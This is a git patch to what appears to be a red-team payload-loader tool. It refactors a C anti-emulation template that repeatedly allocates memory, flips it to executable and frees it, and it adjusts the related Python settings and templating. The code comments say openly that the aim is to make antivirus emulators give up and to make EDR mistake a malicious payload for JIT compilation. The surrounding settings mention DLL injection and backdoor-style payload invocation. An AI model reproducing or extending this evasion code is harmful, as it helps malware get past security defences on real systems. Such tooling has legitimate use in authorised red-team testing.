From 4bed8d1a95c804f67b5e7ca56af3052f5bb02dbd Mon Sep 17 00:00:00 2001
From: Dobin <dobin.rutishauser@gmail.com>
Date: Sun, 7 Jul 2024 12:36:15 +0100
Subject: [PATCH] refactor: improve sirallocalot

---
 data/source/antiemulation/sirallocalot.c    | 49 +++++++++------------
 data/source/carrier/change_rw_rx/template.c |  2 +
 model/settings.py                           |  4 ++
 phases/templater.py                         | 18 +++++---
 4 files changed, 38 insertions(+), 35 deletions(-)

diff --git a/data/source/antiemulation/sirallocalot.c b/data/source/antiemulation/sirallocalot.c
index e0822ff..b4dafe5 100644
--- a/data/source/antiemulation/sirallocalot.c
+++ b/data/source/antiemulation/sirallocalot.c
@@ -1,28 +1,31 @@
 
 
-#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
-#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
-
-#define SIR_SLEEP_TIME 200  // ms
-
-
 /* This will allocate SIR_ALLOC_COUNT RW memory regions, 
-     set them to RX, and free them 
+   set them to RX, and free them. 
+   And this SIR_ITERATION_COUNT times.
+   
+   SIR_ITERATION_COUNT: Single digits, around 5
+   SIR_ALLOC_COUNT:     Tripple digits, around 100
 
-    The idea is that the AV emulator will probably give up, either because
-    of used memory is above maximum, or amount of instructions, or 
-    number of API calls, or time. 
+   Memory   : SIR_ALLOC_COUNT * payload_length
+   Cycles   : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
+   Time     : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
+   API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3
 
-    It hopefully also makes the EDR think this program is doing some
-    kind of interpreter or JIT compilation, and not a malicious payload.
+   The idea is that the AV emulator will probably give up, either because
+   of used memory is above maximum, or amount of instructions, or 
+   number of API calls, or time. 
+
+   It hopefully also makes the EDR think this program is doing some
+   kind of interpreter or JIT compilation, and not a malicious payload.
 */
 
 void antiemulation() {
-    void* allocs[SIR_ALLOC_COUNT];
+    void* allocs[{{SIR_ALLOC_COUNT}}];
     DWORD result;
 
-    for(int i=0; i<SIR_ITERATION_COUNT; i++) {
-        for(int n=0; n<SIR_ALLOC_COUNT; n++) {
+    for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
+        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
             allocs[n] = VirtualAlloc(
                 NULL, 
                 {{PAYLOAD_LEN}}, 
@@ -37,33 +40,23 @@ void antiemulation() {
             }
         }
 
-        // Write something. 
-        /*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
-            char *alloc = allocs[n];
-            alloc[0] = 0; // overwrite the first byte
-        }*/
-
-        for(int n=0; n<SIR_ALLOC_COUNT; n++) {
+        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
             if (VirtualProtect(
                 allocs[n], 
                 {{PAYLOAD_LEN}}, 
                 p_RX, 
                 &result) == 0) 
             {
-                return 7;
+                return;
             }
         }
 
-        Sleep(SIR_SLEEP_TIME);
-
         BOOL bSuccess;
-        for(int n=0; n<SIR_ALLOC_COUNT; n++) {
+        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
             bSuccess = VirtualFree(
                             allocs[n],
                             {{PAYLOAD_LEN}},
                             0x00008000); // MEM_RELEASE
         }
     }
-
-
 }
diff --git a/data/source/carrier/change_rw_rx/template.c b/data/source/carrier/change_rw_rx/template.c
index ce69c29..28b68b4 100644
--- a/data/source/carrier/change_rw_rx/template.c
+++ b/data/source/carrier/change_rw_rx/template.c
@@ -22,6 +22,8 @@ char *supermega_payload;
 
 {{plugin_executionguardrail}}
 
+{{plugin_virtualprotect}}
+
 
 int main()
 {
diff --git a/model/settings.py b/model/settings.py
index a2a8779..05f9205 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -23,6 +23,10 @@ class Settings():
 
         self.dllfunc: str = ""  # For DLL injection
 
+        # Anti-debugging
+        self.sir_iteration_count: int = 5
+        self.sir_alloc_count: int = 100
+
         # Injectable
         self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
         self.inject_exe_in: FilePath = ""
diff --git a/phases/templater.py b/phases/templater.py
index 84517c9..5ee6945 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -60,15 +60,19 @@ def create_c_from_template(settings: Settings, payload_len: int):
     filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
         settings.plugin_antiemulation)
     with open(filepath_antiemulation, "r", encoding='utf-8') as file:
-        sir_iteration_count = 5
-        sir_alloc_count = (int(config.get("sir_target_mem")) / payload_len)+1
-        # if too large, compiler will add a __checkstk dependency
-        if sir_alloc_count > 256:
-            sir_alloc_count = 256
-        logging.info("   AntiEmulation target: iterations: {} alloc: {}".format(
+        sir_iteration_count = settings.sir_iteration_count
+        sir_alloc_count = settings.sir_alloc_count
+        # sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1
+        max_alloc_count = 256
+        if sir_alloc_count > max_alloc_count:
+            # if too large, compiler will add a __checkstk dependency
+            logging.warning("Too large sir allocation count {}, setting to max {}".format(
+                sir_alloc_count, max_alloc_count
+            ))
+            sir_alloc_count = max_alloc_count
+        logging.info("> AntiEmulation: iterations: {}  allocs: {}".format(
             sir_iteration_count, sir_alloc_count)
         )
-
         plugin_antiemualation = file.read()
         plugin_antiemualation = Template(plugin_antiemualation).render({
             'PAYLOAD_LEN': payload_len,